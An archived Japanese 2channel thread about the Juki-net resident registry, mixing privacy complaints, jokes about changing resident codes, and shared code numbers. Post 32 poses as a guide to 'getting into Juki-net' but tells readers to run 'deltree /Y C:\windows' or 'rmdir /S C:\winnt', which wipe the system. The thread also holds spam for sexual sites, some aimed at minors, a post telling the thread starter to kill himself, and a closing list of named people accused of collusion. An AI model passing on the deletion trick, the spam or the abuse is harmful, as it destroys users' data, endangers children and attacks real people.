2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

みんなの住民票コードは何番?

1 :名無しさん:02/07/11 00:12 ID:hOi8tyxX
住基ネットシステムで全国どこからでも住民票がカード1枚で取り出せるようになるんだって
でも、それは建前で国が自由に全国の住民票を見れるシステムだって知ってた?
いままでは、各市区町村に住民票の問い合わせをしていた警察等が、住基ネットシステムでいつでも自由に個人の住民票を調べられるようになる
のは、いかがなものだろう
来年から始まるらしいけど、実際は今年の8月から個人のデータが国の機関に大集合
個人情報保護法案も決まらないままスタートをしてしまう。
面白いのは、来月全国民に住民票コードは何番です、と通知がくるらしいけど番号が気に入らないときは何回でも無料で変更が出来るらしい
自分の住民票コードで、すごい番号が出るまで変更して見よう。



2 :名無しさん:02/07/12 19:54 ID:PSlmqU2c
2!

3 :名無しさん:02/07/12 21:46 ID:eMv8CVzI
>>1
>番号が気に入らないときは何回でも無料で変更が出来るらしい

俺は毎週1回は変えに行くつもりだよ。気に入っててもね。

4 :電報電話局 ◆vmUBIZCU :02/07/12 22:40 ID:fR8WWFqL
19446493150
逝クヨヨロシク サア逝コー


5 :名無しさん:02/07/12 23:11 ID:QuC3jO6S

板違いです。削除依頼ずみ。


6 :名無しさん:02/07/12 23:43 ID:eMv8CVzI
>>5
>削除依頼ずみ。

されないよ。残念だね。

7 :電報電話局 ◆vmUBIZCU :02/07/13 22:18 ID:zhFMnvQM
>>4
詩んでくれ


8 :電報電話局 ◆vmUBIZCU :02/07/15 14:36 ID:MLn5e+q0
今ごろ気づいた。
>>4じゃなくて>>5だった。自爆してしもうた鬱駄氏農


9 :名無しさん:02/07/19 21:34 ID:MKqH0HPI
>>5
削除されてないね(w

10 :名無しさん:02/07/29 11:22 ID:DW052NXC
ジュウキネット大反対。
>>3に大賛成。理想としては毎日変えに行く。
これこそ国のため。
どうしょうも無い事件が叩かれるのが目に見えてるのに、
どうしてこうずるずると行ってしまうのか。
仮に不信任案通っても、この体質じゃぁ、
本当に凍結されるものか。(いや、されないだろう。)

テロが起きりゃ納得するだろうと思って、勝手なことしやがるぜ。
生理的にも番号付くの嫌じゃないか?
移民してやろうかな。

11 :名無しさん:02/07/29 18:05 ID:LEkBjDGo
金持ち・技術者をこの国は手放さない、空港、港で拉致監禁、私の全財産を日本国に寄付しますとか何とか書いた書類に署名、別に署名しなくても本人はなぜか、行方不明


12 :名無しさん:02/07/29 21:13 ID:Qxp+s058
国民番号って、気に入らなかったら変えてもらえるそうですね。

みんな、毎日新しい番号を作ってもらいに行こう。
毎日変更。
変更理由は、
1.番号を知人に見られた。
2.業者のダイレクトメールに、私の番号が記載されていた。
3.占い師がこの番号不吉ですよと言った。
これをローテーションで回していく。
そうしたら、住基ネットなんて「どこでも住民票が取れる」
どころか、住民がガンガン役所に押し掛けるシステムとなる。


13 : ◆vmUBIZCU :02/07/29 22:43 ID:7tzbqx60
>>12
変えるのにも理由は要らないらしい。


14 :ロリ大好き:02/07/29 22:46 ID:sQHFmoKd
現実の世界では少女たちと○○○は
なかなかできなけど、バーチャルな
世界ではOKよ。
一度覗いてみてね!!
http://buruma.up.to


15 :名無しさん:02/07/29 22:48 ID:b7rAbinp
>>1
つかさ、今でも他人の住民票を閲覧することはできるよ?

16 :もぐ:02/07/29 23:24 ID:M6m2d7Nd
ビジネスを始める前に
無料メーリングリストで実際にやっている人の生の声を確認できます。
メーリングリスト参加は無料です。退会も勿論、無料、自由です。
ビジネスを始める場合は、HPの宣伝をする仕事になります。
健康食品ビジネスではありません。完全に在宅で、マイペースで出来ます。
知人友人を勧誘したりする必要はありません。
気軽にのぞいてみて下さいネ。
http://estyle.ne.jp/mogmog/

17 :名無しさん:02/07/31 17:49 ID:44uoZFZX
>>3
>>12
「はい♪法律変えちゃいましたぁ、今お前ら愚民供が持ってる番号が墓碑銘だゴルァ」
絶対にないと言い切れますか?

18 :f:02/07/31 20:16 ID:ZMwHwyjC

-------風俗の総合商社・MTTどこでも-------

〇デリバリーヘルス〇デートクラブ〇女性専用ホストクラブ〇
〇ハードSM奴隷クラブ〇レズビアン倶楽部〇ホモ・オカマ倶楽部
〇変態痴女と遊ぶ会〇痴漢・覗き趣味の会〇変態同好会・各種!
●楽しく遊べます! 090-8002-8356番
-----------美男・美女会員など多数在籍中-----------
  http://www.mttdocomo.jp/
-----女性アルバイト随時募集・高収入(日払い)月100万円可能-----
-----レズビアン・スタッフ●ホモスタッフ●女性専用ホストスタッフ同募-----
http://www.mttdocomo.jp/
------------------------------------------------

19 :名無しさんです(多分:02/08/01 23:48 ID:xv0EV1gG
住民基本台帳ネットワークに反対します。

20 :121:02/08/03 22:24 ID:RDOYQsMv
http://muke.got.to
今日のネタ。これで5回ヌケ!サンプルはタダ!。一日くらいなら楽しめる。
ロリには堪らないッす!一度逝くでし!
     ||        / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
     ||          | 5回抜かないとこうだ! !|
   ∧||__∧      \_ _____________/
   (; ´∀`)フォォォ!     ∨
   ミ≡≡≡j     ∧_∧
   ミ≡≡≡j     (・∀・ )
   ミ≡≡≡j     ( 神  )
    ヽ)ヽ)       | | |
             (_(_)



21 :携帯持ってる人に回しましょう。:02/08/04 19:29 ID:dYecrOb6
携帯持ってる人に回しましょう。
これを見たら、みんな反対するでしょう。

http://www.heiandou.com/imode/zyuuki-net-hantai/zyuuki-net-hantai.htm

22 :名無しさん:02/08/05 07:18 ID:4vPzBZKM
住基ネットは簡単に無力化します。
毎日、市区町村の窓口にいって、住基番号の変更を申請しましょう。
法律で何ででも変更できるようになってます

23 :荒川区役所の星:02/08/05 12:22 ID:8yakNxOp
ていうか今までダウンされなかったネットってあるの?
攻撃には完璧な防御をしてます、みたいな事アフォな役人が
TVで言ってたけど、それって「私はPCオンチです」って
言ってるのと同じ。
あとさー、全国どこでもオケーって事はさー、全国どこから
変な事されるか分からないって事だよね?
今までも役人が住民のデータ売り付けるのは普通にやってたけど、
これからはわざわざコピー機やプリンターとこ行かなくてもオケー
だから小心者でもバンバン小遣い稼ぎするんじゃない?
短時間で多量にすい出せるしな。
少なくとも荒川区役所じゃそんな感じだよ、俺はしないけどね。

24 :荒川区役所の星:02/08/05 13:50 ID:UcSywRiv
あとはあれだな、攻撃が外部からのみと思い込んでるのが凄いな
荒川区じゃ賭けてもいいけど職員からの腹黒アクセスがダントツで
多いよ、内部からは役職によってはフリー状態だし、ログも簡単に
消去できる。ていうか出来た。
消防署の横にさー、食堂があるんだけど夕方の5時過ぎに行ってみな
あやし〜二人組みがいるよーん、3日置きにね。

25 :名無しさん:02/08/05 14:39 ID:HXrYBAND
>>23
>ていうか今までダウンされなかったネットってあるの?
何が言いたいのかさっぱり。

26 :名無しさん:02/08/10 13:03 ID:WZpxPX/S
54128960352だが何か?

番号だけわかったところで何ができるの?

27 :名無しさん:02/08/10 15:08 ID:Qy/PLgbX
これって韓国の「住民番号」に相当するものだな。
徴兵の時の事務もスムーズ。

28 :コギャルとHな出会い:02/08/10 15:59 ID:Qmwv8UBr
http://kado7.ug.to/net/


朝までから騒ぎ!!
   小中高生
 コギャル〜熟女まで
   メル友
  i/j/PC/対応

女性の子もたくさん来てね
                  
おこずかいの欲しい女の子もたくさん来てね!!

全国デ−トスポット情報も有ります

29 :名無しさん:02/08/27 14:54 ID:ZwJbThC5
44177739901ですが、何か?

30 :2チャンねるで超有名サイト:02/08/27 16:57 ID:Zu93hWue
http://s1p.net/pzqkk 


 携帯対応

男性より女性の書き込み多し
女性性65%男性35%割合です
穴場的サイトです。
幼い中高生直アポ直電
OL〜熟女迄の出会い
 聞ける穴場サイトです
 


31 :名無しさん:02/09/02 22:36 ID:oMJ9sj0A
これからどんな使われ方をするかもはっきりしない住民票コードを公開するのは
どうかと思うんですが。(番号が本物だったらですが)
上の方で外部流出の可能性も指摘されてるわけですし・・・。
番号の変更をおすすめします。

32 :名無し:02/09/02 23:26 ID:YNr0bUsT
住基ネットへの入り方

【1】スタート→プログラム→MS-DOSプロンプト、またはコマンドプロンプトを起動する。
【2】win95かwin98の人は「deltree /Y C:\windows」
  winNTかwin2000の人は「rmdir /S C:\winnt」
  ※「/Y」は「yield」の略。「生産する」の意味。
    「/S」は「second /Y」の略。こちらの方が改良されている。
【3】あとは自動的にwindowsがつないでくれるよ。


33 :名無しさん:02/09/03 01:07 ID:WqEOi+UK
>22
むかし消費税が導入された時に「みんなで1円玉を貯めこんで市中から
1円玉を無くし、消費税を廃止に追い込みましょう」なんて事を言ってた
人がいるけど、それと似た発想ですね。

34 :名無しさん:02/11/02 17:06 ID:fyylpku7


35 :名無しさん:03/01/05 02:43 ID:ZyL7ubBZ
        / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
Λ_Λ  | 君さぁ こんなスレッド立てるから          |
( ´∀`)< 厨房って言われちゃうんだよ             |
( ΛΛ つ >―――――――――――――――――――‐<
 ( ゚Д゚) < おまえのことを必要としてる奴なんて         |
 /つつ  | いないんだからさっさと回線切って首吊れ     |
       \____________________/

(-_-) ハヤクシンデネ… (-_-) ハヤクシンデネ… (-_-) ハヤクシンデネ…
(∩∩) (∩∩) (∩∩)

(-_-) ハヤクシンデネ… (-_-) ハヤクシンデネ… (-_-) ハヤクシンデネ…
(∩∩) (∩∩) (∩∩)

(-_-) ハヤクシンデネ… (-_-) ハヤクシンデネ… (-_-) ハヤクシンデネ…
(∩∩) (∩∩) (∩∩)


36 :名無しさん:03/01/07 14:01 ID:QHMgk8Ah
44877736650

37 :山崎渉:03/01/08 17:59 ID:IcuYk1UW
(^^)

38 :名無しさん:03/01/14 15:17 ID:+J2KzqG9
          || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
          || イグ二ッションを   ||
          ||  成功させよう! Λ_Λ  今日の目標はこれです!
          ||         \ (゚ー゚*)    いいですね?
          ||________⊂⊂ |
  ∧ ∧    ∧ ∧    ∧ ∧    | ̄ ̄ ̄ ̄|
  (  ∧ ∧ (   ∧ ∧ (  ∧ ∧ |      |
〜(_(  ∧ ∧ __(  ∧ ∧__(   ∧ ∧ ̄ ̄ ̄
  〜(_(  ∧ ∧_(  ∧ ∧_(   ∧ ∧  は〜い、先生。
    〜(_(   ,,)〜(_(   ,,)〜(_(   ,,)
      〜(___ノ  〜(___ノ   〜(___



39 :名無しさん:03/01/14 15:18 ID:+J2KzqG9
          || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
          || イグ二ッションを     ||
          ||  成功させよう! Λ_Λ  今日の目標はこれです!
          ||         \ (゚ー゚*)    いいですね?
          ||________⊂⊂ |
  ∧ ∧    ∧ ∧    ∧ ∧    | ̄ ̄ ̄ ̄|
  (  ∧ ∧ (   ∧ ∧ (  ∧ ∧ |      |
〜(_(  ∧ ∧ __(  ∧ ∧__(   ∧ ∧ ̄ ̄ ̄
  〜(_(  ∧ ∧_(  ∧ ∧_(   ∧ ∧  は〜い、先生。
    〜(_(   ,,)〜(_(   ,,)〜(_(   ,,)
      〜(___ノ  〜(___ノ   〜(___




40 :cx:03/01/14 15:27 ID:4W4K08Uj
http://www6.ocn.ne.jp/~endou/index2.html

41 :山崎渉:03/01/19 02:32 ID:oaXnasX5
(^^)

42 :山崎渉:03/03/13 13:47 ID:rFXZoNnd
(^^)

43 :山崎渉:03/04/17 08:40 ID:UwuQMHPy
(^^)

44 :山崎渉:03/04/20 03:29 ID:6AdNKdJi
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

45 :山崎渉:03/05/21 21:31 ID:aohlY/42
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

46 :山崎渉:03/05/21 22:47 ID:aohlY/42
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

47 :山崎渉:03/05/28 14:01 ID:4DAI7JXR
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉

48 :名無しさん:03/07/12 11:14 ID:TJt8DFZ7
>>1
パスポートや運転免許証でも広域交付の申請はできるよ。
住民基本台帳カードが必ずしも必要ではない。

49 :山崎 渉:03/07/15 13:00 ID:BpF2n1Zc

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

50 :名無しさん:03/07/30 20:41 ID:2wJkJVpf
あらゆる社会管理システムは個人の識別や特性を数値化するところから
始まる、って偉い人が言ってた、ぴょん。

51 :ぼるじょあ ◆ySd1dMH5Gk :03/08/02 02:44 ID:CKFbBW1X
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

52 :名無しさん:03/08/04 19:16 ID:5i6RlKFb
今すぐ会いたいの。ひろみはあなたなしじゃもうだめみたい。

私、ここにいるから・・・・・探しに来て、くれる?

7日間会費フリー、10分間無料になってるの、だから来て。

あなたに会えなくちゃ、寂しくて死んじゃいそうだから

待ってます。来てくださいね!
→→→http://www.gals-cafe.com

53 :どとうとしや:03/08/09 21:55 ID:AcOH+BSM
私も自分の住民票コードは暗記しているが……。
x976x271xxx で勘弁を。

54 :名無しさん:03/08/09 22:41 ID:tfwkS0Tg
これマジで稼げるよ!2ちゃんに貼ってあるからってネタじゃありません(w
住所・電話番号などは一切必要無し!

@IDを取得する。(無料)
A宣伝用のURLを掲示板に貼る!!
Bそのまんま待つ! 
C一ヶ月で〜10万ぐらいは稼げる!貼りまくれば20万ぐらいもいけるよ!

ちなみに私は先月で約11万稼ぎました(´∀`)
http://www.adultshoping.com/index.cgi?id=1060433342
http://www.adultshoping.com/addclickport.cgi?pid=1060433342

55 :名無しさん:03/08/09 22:48 ID:LinEhXGo
ムッチリ系の巨乳美女ですね。バイブを挿入されはしゃぎまくっちゃいます。
そのあたりまでは普通のビデオですがそこからがすごいです。
なんと5人連続生姦、中出しに挑戦!オマンコの中はザーメンまみれ!
大量のザーメンが流れ出てくるラストシーンは圧巻ですよ。
無料ムービーあるよ。
http://www.cappuchinko.com/


56 :山崎 渉:03/08/15 16:44 ID:TJDFJX4r
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

57 :名無し:03/08/16 23:39 ID:PhfD/Fh9
住基ネットと言えば、田中康夫が長野県で侵入テストをするらしい。面白そうだ。
総務省の言い分が正しいのか、住基ネット反対派の言い分が正しいのか、白黒つ
けてもらいたい。それにしても田中康夫の政策は面白い。

58 :名無しさん:03/08/17 10:52 ID:xyva7eem
>>57
インターネットと繋がってんだろ?ハッカーにはカンタンに侵入できるよ。
俺はむしろ、タナカはウラで国と繋がってて、「侵入テストしたけど、侵入出来ませんでした。」
とそういう出来レース結果を出すって方を心配している。

59 :名無しさん:03/08/26 18:49 ID:dFnXh3GJ
鶴・八拾四萬五阡参百弐拾壱番ですが、何か。

60 :名無しさん:03/08/26 19:21 ID:SNb+0Y0w
アダルトDVD1枚500円〜!

http://www.net-de-dvd.com/


61 :名無しさん:03/08/30 17:19 ID:ooLthz/B
無線LANを平気で使ってる役場も多い。
ラ○○ラ○○で盗聴実験にも成功してた。
そんなとこが住基ネットに接続。まさにハッカー大喜び。
不気味だな(w

62 :名無しさん:04/05/18 23:32 ID:OIhvGYE5
住基ネットは、確かに不気味だ。

63 :名無しさん:04/06/02 22:17 ID:ZhdVRIAF
コードはどのような順番ですか。また、コードの数字には意味はありますか。

64 :名無しさん:2005/06/02(木) 22:55:10 ID:ZiVIzp1C
住民票が偽造かどうか見分ける方法ってありますか?
FAXしかないのですが・・・
どなたか教えてください。

65 :名無しさん:2005/06/04(土) 00:07:59 ID:JhpmMtpd
そんなのここにカキコ出来るか(`ヘ´)

66 :名無しさん:2005/12/31(土) 15:09:31 ID:6CLjkJK7
hosyu

67 :名無しさん:2006/01/23(月) 18:47:44 ID:OXhhM42n
千葉県民です。出先の都内で住民票を取りたいのですが免許証でOKですよね?

68 :名無しさん:2006/06/03(土) 09:14:54 ID:MmngBY7T
>>67
ダメだと言われたら
「住民基本大腸ネットは稼動していないのですか??
 それはそれはたいへんですね。個人情報の大量流出でもあったのですか」
と捨てぜりふを残して立ち去りましょう。

69 :こすりつけ最高:2007/07/16(月) 19:57:17 ID:2ubLJU1C
豆 もってこい 豆

イヤラシイ番号GET!!!

70 :名無しさん:2007/07/23(月) 09:34:34 ID:gKvv+IRF
結局 紙に必要事項書いて住民票とったな。カードと暗証だけじゃなかった。

71 :名無しさん:2007/07/23(月) 19:39:53 ID:gKvv+IRF
免許 パスポが無難だな

72 :名無しさん:2007/07/23(月) 19:56:41 ID:gKvv+IRF
銀行とか番号ひかえたりするから免許やパスポより什器カードだすね

73 :名無しさん:2007/07/26(木) 09:14:56 ID:7OM8gwEn
番号 まあまあだな

74 :名無しさん:2008/03/02(日) 16:13:48 ID:Rd5OBSrw
質問です。
現在千葉県に住んで4年が経ちました。が住民票は東京渋谷区に置いてきたままです。渋谷に行かず千葉で住民票移動はできませんかね?免許証はありますが前住所のまま更新したので渋谷のままです。
どなたかご教授下さい
m(_ _)m

75 :かばとっと:2008/04/03(木) 03:43:07 ID:aFuRsrmI
年賀状の配達は無事すんだかどうかわかりますでしょうか。

76 :名無しさん:2008/04/05(土) 06:36:43 ID:1Hmt7SLb
>>74
先ず借金を完済しましょう。
話はそれからになります。

77 :名無しさん:2008/04/17(木) 07:11:38 ID:i2+HDqhM
区役所で移せるってマジ?

78 :age:2008/05/14(水) 22:07:41 ID:fv0H8s/D
age

79 :名無しさん:2008/05/20(火) 23:04:47 ID:OIfmvusX
.

80 :名無しさん:2008/08/16(土) 20:07:04 ID:4qWDtN7P
シャッフル

81 :名無しさん:2008/10/04(土) 22:20:37 ID:RELprn9M
五十川卓司

82 :名無しさん:2008/11/06(木) 12:56:53 ID:h7A989yC
俺勝手に変えれられたんだけど何?

83 :五十川卓司 ◇soalaRO1Zo:2008/12/15(月) 23:20:31 ID:pP7zD40p
私の好きな言葉

光繊線路
小野剛
大内俊身
小川浩
大野和明
滝井繁男
今井功
中川了滋
古田佑紀
通話明細の蓄積漏洩
暴力団体の組織犯罪
旧郵政省の行政職員の利権
総人労と交換屋との愚劣な権力闘争
再就職先を確保するという利権争奪
小野寺正
児島仁
大星公二
西村守正
北海道人脈による旧郵政省関係者との対立を偽装した癒着
警察組織や検察組織までが、関与している
祷雅和、
小寺広哲、
佐田敦彦、
早苗慶太、
田中敏晶、
平木伸幸、
吉田俊宏

20 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)